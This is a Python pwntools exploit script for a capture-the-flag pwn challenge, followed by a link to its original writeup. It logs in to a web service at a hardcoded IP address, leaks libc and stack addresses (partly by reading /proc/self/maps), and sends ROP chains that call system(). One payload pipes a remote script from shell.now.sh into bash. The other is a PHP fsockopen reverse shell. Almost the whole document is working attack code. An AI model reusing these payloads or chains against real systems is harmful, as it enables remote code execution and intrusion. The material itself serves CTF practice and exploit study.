```python  
from pwn import *  
import requests,re

url = "http://134.175.185.244"  
libc = ELF("./libc.so")  
session = requests.Session()

def login():  
paramsPost = {"password":"goodlucktoyou","submit":"submit","username":"admin"}  
session.post(url+"/index.php", data=paramsPost)

def send(payload):  
paramsPost = {"submit":"submit","search":payload}  
response = session.post(url+"/select.php", data=paramsPost)  
return re.findall('\<\/form\>(.*?)\<br\>',response.content)[0]

def read(payload):  
paramsPost = {"submit":"submit","search":payload}  
response = session.post(url+"/select.php", data=paramsPost)  
return response.content[1517+len(payload):-1]

login()

# leak libc and stack  
libc.address =
int('0x'+re.findall('(.*?)libc-2.28',read("/proc/self/maps"))[0][:12],16)  
stack = u64(send('a'*0x64)[0x64:].ljust(8, b'\0'))

log.warn("stack: "+str(hex(stack)))  
log.warn("libc: "+str(hex(libc.address)))

# gadget  
pop_rdi = libc.address + 0x023a5f  
pop4_ret = libc.address + 0x024568

def attack1():  
payload = "a"*0x88  
payload += p64(pop_rdi) + p64(stack+0xa0) + p64(libc.symbols['system'])  
payload += "curl https://shell.now.sh/x.x.x.x:8888|bash\x00"  
send(payload)

def attack2():  
payload = "php -r '$sock=fsockopen(\"x.x.x.x\",8888);exec(\"bash -i <&3 >&3
2>&3\");'\x00".ljust(0x88)  
payload += p64(pop_rdi)*10+p64(pop4_ret)+p64(0)*4  
payload += p64(pop_rdi)+p64(stack)+p64(libc.symbols['system'])  
send(payload)

attack2()  
```

Original writeup
(https://xuanxuanblingbling.github.io/ctf/pwn/2020/05/05/mixture/).